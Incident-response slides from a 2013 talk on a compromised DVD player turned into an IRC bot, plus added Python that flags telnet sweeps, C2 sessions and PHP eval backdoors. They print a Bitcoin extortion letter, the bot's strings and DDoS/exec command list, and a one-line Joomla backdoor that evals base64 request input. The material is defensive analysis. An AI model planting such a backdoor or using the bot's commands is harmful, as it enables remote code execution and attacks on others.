Who finds the bot?
tadej.hren@cert.si
HEK.SI
12.4.2013
Analysis of a compromised multimedia player
1. Who finds the bot? tadej.hren@cert.si, HEK.SI, 12.4.2013
2. Dear xxx friends,
   I’m DarkRobinHood, me and my friends we live in the Internet environments. Like my namesake used me to give equity in this world, I don’t like to steal, perhaps I prefer to invite people like you that works in the financial and economic markets, in general on the freedom and democracy’s, coming to us. The increased taxes, your arrogance and your injustice way to take money from us, only to deceive people that you are doing a honest job, got my attention. I’d like to invite you, with kindness, to give 75BTC before 12:00(GMT+1) on 10/16/2012 to the next Bitcoin Address: 1k966rggo3h85URb5unrXexxxxxxxxxxxxxxx . This money is going to be used for our noble cause. If you don’t get my apeal we’ll find ourselves in a position to gap you, to kick you out of our country. Showing that I’m not talking nosense, even this night you will have a small taste of what it will happen to you. My honor doesn’t let me to abey you in such way, it should be a lesson for you of thinking before you do something.
   Sincerely, Dark Robin Hood
3. $ nmap 89.xxx.xxx.xxx
   Starting Nmap 5.00 ( http://nmap.org ) at 2012-10-18 13:27 CEST
   Interesting ports on 89.xxx.xxx.xxx:
   Not shown: 991 closed ports
   PORT     STATE    SERVICE
   23/tcp   open     telnet
   25/tcp   filtered smtp
   80/tcp   open     http
   135/tcp  filtered msrpc
   139/tcp  filtered netbios-ssn
   445/tcp  filtered microsoft-ds
   1025/tcp filtered NFS-or-IIS
   Nmap done: 1 IP address (1 host up) scanned in 1.26 seconds
4. $ telnet 89.xxx.xxx.xxx
   Trying 89.xxx.xxx.xxx...
   Connected to 89.xxx.xxx.xxx.
   Escape character is '^]'.
   Venus login: root
   warning: cannot change to home directory
   BusyBox v1.1.3 (2010.09.07-08:50+0000) Built-in shell (ash)
   Enter 'help' for a list of built-in commands.
   # uname -a
   Linux Venus 2.6.12.6-VENUS #323635 Tue Sep 7 16:49:31 CST 2010 mips unknown
5. Live-response commands used for the triage (the slide has two columns: file system and timeline on the left, processes, sessions and network on the right):
   # find / -ctime -10 -print
   # find / -mtime -5 -ls
   # find / -amin -120 -print
   # stat somefile
   # cat .bash_history
   # crontab
   # ls -lAct
   # ls -l /proc/PID/
   # chkrootkit
   # rkhunter

   # ps -ef
   # lsof -np PID
   # lsof -ni TCP:22
   # pstree -aAp
   # last -i
   # file somefile.bin
   # strings somefile.bin
   # less /var/log/secure
   # less /var/log/access.log
   # netstat -anpt
6. # netstat -aen
   Active Internet connections (servers and established)
   Proto Recv-Q Send-Q Local Address          Foreign Address      State
   tcp        0      0 0.0.0.0:80             0.0.0.0:*            LISTEN
   tcp        0      0 0.0.0.0:23             0.0.0.0:*            LISTEN
   tcp        0      1 89.xxx.xxx.xxx:4229    165.91.24.5:23       SYN_SENT
   tcp        0      1 89.xxx.xxx.xxx:1457    165.91.24.80:23      SYN_SENT
   tcp        0      1 89.xxx.xxx.xxx:4935    165.91.24.22:23      SYN_SENT
   tcp        0      1 89.xxx.xxx.xxx:2247    165.91.24.76:23      SYN_SENT
   tcp        0      1 89.xxx.xxx.xxx:3836    165.91.24.42:23      SYN_SENT
   tcp        0      1 89.xxx.xxx.xxx:3523    165.91.24.41:23      SYN_SENT
   tcp        0      1 89.xxx.xxx.xxx:2127    165.91.24.60:23      SYN_SENT
   tcp        0      1 89.xxx.xxx.xxx:5641    37.xx.xx.xx:65535    ESTABLISHED
   tcp        0      1 89.xxx.xxx.xxx:2580    165.91.24.126:23     SYN_SENT
   tcp        0      1 89.xxx.xxx.xxx:2768    165.91.24.77:23      SYN_SENT
   tcp        0      1 89.xxx.xxx.xxx:4224    165.91.24.39:23      SYN_SENT
   tcp        0      1 89.xxx.xxx.xxx:1981    165.91.24.16:23      SYN_SENT
   tcp        0      1 89.xxx.xxx.xxx:2496    165.91.24.110:23     SYN_SENT
   tcp        0      1 89.xxx.xxx.xxx:2500    165.91.24.30:23      SYN_SENT
   tcp        0      1 89.xxx.xxx.xxx:4526    165.91.24.70:23      SYN_SENT
   tcp        0      1 89.xxx.xxx.xxx:2720    165.91.24.93:23      SYN_SENT
   tcp        0      1 89.xxx.xxx.xxx:4865    165.91.24.4:23       SYN_SENT
   tcp        0      1 89.xxx.xxx.xxx:3356    165.91.24.26:23      SYN_SENT
   tcp        0      1 89.xxx.xxx.xxx:1659    165.91.24.1:23       SYN_SENT
   tcp        0      1 89.xxx.xxx.xxx:1786    165.91.24.96:23      SYN_SENT
   tcp        0      1 89.xxx.xxx.xxx:1981    165.91.24.17:23      SYN_SENT
7. # ps aux
   PID   Uid   VmSize Stat Command
   1     root  380    S    init
   2     root         SWN  [ksoftirqd/0]
   3     root         SW<  [events/0]
   4     root         SW<  [khelper]
   5     root         SW<  [kthread]
   6     root         SW<  [kblockd/0]
   7     root         SW   [khubd]
   8     root         SW   [rpc-1]
   9     root         SW   [rpc-3]
   10    root         SW   [pdflush]
   11    root         SW   [pdflush]
   13    root         SW<  [aio/0]
   14    root         SW<  [cifsoplockd]
   15    root         SW<  [cifsdnotifyd]
   12    root         SW   [kswapd0]
   16    root         SW   [eth0]
   17    root         SW   [mtdblockd]
   29    root  384    S    init
   30    root  384    S    init
8. (ps aux, continued)
   181   root  224    S    ./RootApp DvdPlayer
   182   root  224    S    ./RootApp DvdPlayer
   3191  root  184    S    msx
   3245  root  428    S    inetd
   24399 root         Z    [msx]
   25360 root  7780   R    DvdPlayer -s power
   25361 root  224    S    ./RootApp DvdPlayer
   25362 root  7780   S    DvdPlayer -s power
   25363 root  7780   S N  DvdPlayer -s power
   25364 root  7780   S N  DvdPlayer -s power
   25376 root  7780   S    DvdPlayer -s power
   25377 root  7780   S    DvdPlayer -s power
   25381 root  7780   S    DvdPlayer -s power
   25382 root  7780   S    DvdPlayer -s power
   25383 root  7780   S    DvdPlayer -s power
   25386 root  7780   S    DvdPlayer -s power
   25387 root  7780   S    DvdPlayer -s power
   25388 root  7780   S    DvdPlayer -s power
   25389 root  7780   S    DvdPlayer -s power
   25390 root  7780   S    DvdPlayer -s power
   25391 root  7780   S    DvdPlayer -s power
   25392 root  7780   S    DvdPlayer -s power
9. # ls -lA /var/run
   -rw-r--r-- 1 root root     45 Oct 16 10:37 .httpd_status
   -rw-r--r-- 1 root root      5 Oct 18 11:08 .lightpid
   -rw-r--r-- 1 root root      0 Oct 18 11:08 .lightscan
   -rw-r--r-- 1 root root  22497 Oct 18 11:02 .scan.log
   -rw-r--r-- 1 root root     67 Oct 18 11:07 .stats
   -rwxr-xr-x 1 root root 203081 Oct 18 11:09 arm
   -rwxr-xr-x 1 root root 204284 Oct 17 16:23 ax
   -rw-r--r-- 1 root root      5 Oct 17 16:23 dhcp.pid
   -rw-r--r-- 1 root root      6 Oct 17 16:23 inetd.pid
   -rwxr-xr-x 1 root root 266266 Oct 18 11:09 mips
   -rwxr-xr-x 1 root root 266327 Oct 18 11:08 mipsel
   -rwxr-xr-x 1 root root 266294 Oct 17 16:23 msx
   -rwxr-xr-x 1 root root 266201 Oct 17 16:23 mx
   -rwxr-xr-x 1 root root 195648 Oct 18 11:09 ppc
   -rwxr-xr-x 1 root root 196947 Oct 17 16:23 px
   -rwxr-xr-x 1 root root   2211 Oct 18 11:07 run.chk
   -rwxr-xr-x 1 root root 180529 Oct 18 11:09 sh
   -rwxr-xr-x 1 root root 181348 Oct 17 16:23 sx
   -rwxr-xr-x 1 root root  48480 Oct 18 11:09 x86_32
10. /tmp/etc # ftpput
    BusyBox v1.1.3 (2010.09.07-08:50+0000) multi-call binary
    Usage: ftpput [options] remote-host remote-file local-file
    Store a local file on a remote machine via FTP.
    Options:
      -v, --verbose   Verbose
      -u, --username  Username to be used
      -p, --password  Password to be used
      -P, --port      Port number to be used
11. $ strings msx
    ...
    PRIVMSG %s :[login] you are logged in, (%s).
    PRIVMSG %s :[!login] sorry, wrong authenthication password!
    ...
    GET /n09230945.asp HTTP/1.0
    Host: automation.whatismyip.com
    %d.%d.%*s.%*s
    ...
    xxxxxx.user32.com:65535
    /var/run/.lightpid
    0123456789abcdefghilmnopqrstuvzywkxABCDEFGHILMNOPQRSTUVZYWKX|:.*<>@_;: ,.-+*^?=)(|AB&%$D"!wkyxzvutsrqponmlihgfedcba~123456789FUCK
    #aidra
    ->%s %s %s
    PASS burruciaga123
    NICK %s
    USER pwn localhost * :Lightaidra ;)
    TOPIC %s
12. (strings msx, continued: the bot's built-in help text)
    PRIVMSG %s :* *** Access Commands:
    PRIVMSG %s :*
    PRIVMSG %s :* .login <password> - login to bot's party-line
    PRIVMSG %s :* .logout - logout from bot's party-line
    PRIVMSG %s :* *** Miscs Commands
    PRIVMSG %s :* .exec <commands> - execute a system command
    PRIVMSG %s :* .version - show the current version of bot
    PRIVMSG %s :* .status - show the status of bot
    PRIVMSG %s :* .help - show this help message
    PRIVMSG %s :* *** Scan Commands
    PRIVMSG %s :* .advscan <a> <b> <user> <passwd> - scan with user:pass (A.B) classes sets by you
    PRIVMSG %s :* .advscan <a> <b> - scan with d-link config reset bug
    PRIVMSG %s :* .advscan->recursive <user> <pass> - scan local ip range with user:pass, (C.D) classes random
    PRIVMSG %s :* .advscan->recursive - scan local ip range with d-link config reset bug
    PRIVMSG %s :* .advscan->random <user> <pass> - scan random ip range with user:pass, (A.B) classes random
    PRIVMSG %s :* .advscan->random - scan random ip range with d-link config reset bug
    PRIVMSG %s :* .advscan->random->b <user> <pass> - scan local ip range with user:pass, A.(B) class random
    PRIVMSG %s :* .advscan->random->b - scan local ip range with d-link config reset bug
    PRIVMSG %s :* .stop - stop current operation (scan/dos)
    PRIVMSG %s :* *** DDos Commands:
    PRIVMSG %s :* NOTE: <port> to 0 = random ports, <ip> to 0 = random spoofing,
    PRIVMSG %s :* use .*flood->[m,a,p,s,x] for selected ddos, example: .ngackflood->s host port secs
    PRIVMSG %s :* where: *=syn,ngsyn,ack,ngack m=mipsel a=arm p=ppc s=superh x=x86
    PRIVMSG %s :* .spoof <ip> - set the source address ip spoof
    PRIVMSG %s :* .synflood <host> <port> <secs> - tcp syn flooder
    PRIVMSG %s :* .ngsynflood <host> <port> <secs> - tcp ngsyn flooder (new generation)
    PRIVMSG %s :* .ackflood <host> <port> <secs> - tcp ack flooder
    PRIVMSG %s :* .ngackflood <host> <port> <secs> - tcp ngack flooder (new generation)
    PRIVMSG %s :* *** IRC Commands:
    PRIVMSG %s :* .setchan <channel> - set new master channel
    PRIVMSG %s :* .join <channel> <password> - join bot in selected room
    PRIVMSG %s :* .part <channel> - part bot from selected room
    PRIVMSG %s :* .quit - kill the current process
    PRIVMSG %s :* *** EOF
13. HD Moore, The Wild West, https://www.youtube.com/watch?v=b-uPh99whw4
14. $ ls -lA /var/log/httpd
    total 42124
    -rw-r----- 1 root adm 15761694 2013-02-27 14:17 access_log
    -rw-r----- 1 root adm 23013951 2013-02-24 01:16 access_log.1
    -rw-r----- 1 root adm  1339351 2013-02-24 01:17 access_log.2.gz
    -rw-r----- 1 root adm  1412975 2013-02-17 01:17 access_log.3.gz
    -rw-r----- 1 root adm  1531839 2013-02-10 01:17 access_log.4.gz
15. 184.168.27.120 - - [25/Feb/2013:16:56:07 +0100] "POST /plugins/system/dvmessages/dvmessages.php HTTP/1.1" 200 10 "-" "Mozilla/5.0 Firefox/3.6.12"
16. <?php
    defined( '_JEXEC' ) or die(@eval(base64_decode($_REQUEST['c_id'])));
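The netstat output on slide 6 is the clearest sign of the bot: dozens of half-open connections to port 23 across one /24 (the bot's telnet scanner), plus a single established session to port 65535 (its IRC control channel). The following Python is an added example, not code from the talk, that turns that reading into a check you can run over a saved connection table; the sample lines are a constructed subset of slide 6 with the slide's anonymised addresses kept as-is.

```python
from collections import Counter

# Connection-table lines constructed from slide 6 (addresses anonymised as on the slide).
NETSTAT_SAMPLE = """\
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:23 0.0.0.0:* LISTEN
tcp 0 1 89.xxx.xxx.xxx:4229 165.91.24.5:23 SYN_SENT
tcp 0 1 89.xxx.xxx.xxx:1457 165.91.24.80:23 SYN_SENT
tcp 0 1 89.xxx.xxx.xxx:4935 165.91.24.22:23 SYN_SENT
tcp 0 1 89.xxx.xxx.xxx:2247 165.91.24.76:23 SYN_SENT
tcp 0 1 89.xxx.xxx.xxx:5641 37.xx.xx.xx:65535 ESTABLISHED
tcp 0 1 89.xxx.xxx.xxx:2580 165.91.24.126:23 SYN_SENT
tcp 0 1 89.xxx.xxx.xxx:2768 165.91.24.77:23 SYN_SENT
"""


def parse_netstat(text):
    """Return (proto, remote_ip, remote_port, state) for every non-listening TCP/UDP socket."""
    conns = []
    for line in text.splitlines():
        f = line.split()
        if len(f) < 6 or f[0] not in ("tcp", "udp") or f[5] == "LISTEN":
            continue
        rip, _, rport = f[4].rpartition(":")  # split on the last ':' only
        conns.append((f[0], rip, int(rport), f[5]))
    return conns


def telnet_sweeps(conns, min_targets=5):
    """Half-open telnet connections grouped by destination /24: a sweep looks like
    many distinct hosts in one network, all stuck in SYN_SENT."""
    per_net = Counter()
    for _, rip, rport, state in conns:
        if rport == 23 and state == "SYN_SENT":
            per_net[rip.rsplit(".", 1)[0] + ".0/24"] += 1
    return {net: n for net, n in per_net.items() if n >= min_targets}


def odd_established(conns, common=(22, 25, 53, 80, 443)):
    """Established sessions to ports no media player should talk to: C2 candidates."""
    return [(rip, rport) for _, rip, rport, st in conns
            if st == "ESTABLISHED" and rport not in common]


if __name__ == "__main__":
    conns = parse_netstat(NETSTAT_SAMPLE)
    print("telnet sweeps:", telnet_sweeps(conns))
    print("suspicious established:", odd_established(conns))
```

On the full slide 6 table the sweep counter reaches 21 targets in 165.91.24.0/24; the `.scan.log` and `.lightscan` files in /var/run on slide 9 are the on-disk side of the same activity.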
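Slides 15 and 16 show the second case: a Joomla plugin file whose `_JEXEC` guard has been turned into a backdoor that evals whatever arrives base64-encoded in the `c_id` request parameter, and the access-log line of it being used. As an added example (not the talk's code), the Python below flags PHP sources where request input reaches `eval()` and then pulls the POSTs to each flagged file out of Apache combined-format log lines; it generalises slightly beyond the slide by also matching `$_GET`, `$_POST` and `$_COOKIE`. File contents and the second log line are constructed; the first log line is the one from slide 15.

```python
import re

# Constructed PHP sources: the slide-16 backdoor and a benign Joomla-style guard for contrast.
SAMPLE_FILES = {
    "plugins/system/dvmessages/dvmessages.php":
        "<?php\ndefined( '_JEXEC' ) or die(@eval(base64_decode($_REQUEST['c_id'])));\n",
    "plugins/system/legit/legit.php":
        "<?php\ndefined('_JEXEC') or die;\nclass PlgSystemLegit {}\n",
}

# eval() (optionally silenced with @) whose argument comes straight from request
# input, with or without a base64_decode() wrapper in between.
BACKDOOR_RE = re.compile(
    r"@?\s*eval\s*\(\s*(?:base64_decode\s*\(\s*)?\$_(?:REQUEST|GET|POST|COOKIE)\b",
    re.IGNORECASE,
)


def find_backdoors(files):
    """Return the paths (sorted) whose PHP source passes request input into eval()."""
    return sorted(p for p, src in files.items() if BACKDOOR_RE.search(src))


# Apache combined-format lines: slide 15's request plus one constructed benign request.
LOG_SAMPLE = [
    '184.168.27.120 - - [25/Feb/2013:16:56:07 +0100] "POST /plugins/system/dvmessages/dvmessages.php HTTP/1.1" 200 10 "-" "Mozilla/5.0 Firefox/3.6.12"',
    '10.0.0.7 - - [25/Feb/2013:16:57:00 +0100] "GET /index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
]
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)')


def hits_for(paths, log_lines):
    """POSTs to any flagged file: source address, timestamp, URL and status code.
    Commands go in the POST body, so only the log's method/path/status are visible."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        src, when, method, url, status, _size = m.groups()
        if method == "POST" and url.lstrip("/") in paths:
            hits.append((src, when, url, int(status)))
    return hits


if __name__ == "__main__":
    flagged = find_backdoors(SAMPLE_FILES)
    print("backdoored files:", flagged)
    print("shell usage:", hits_for(flagged, LOG_SAMPLE))
```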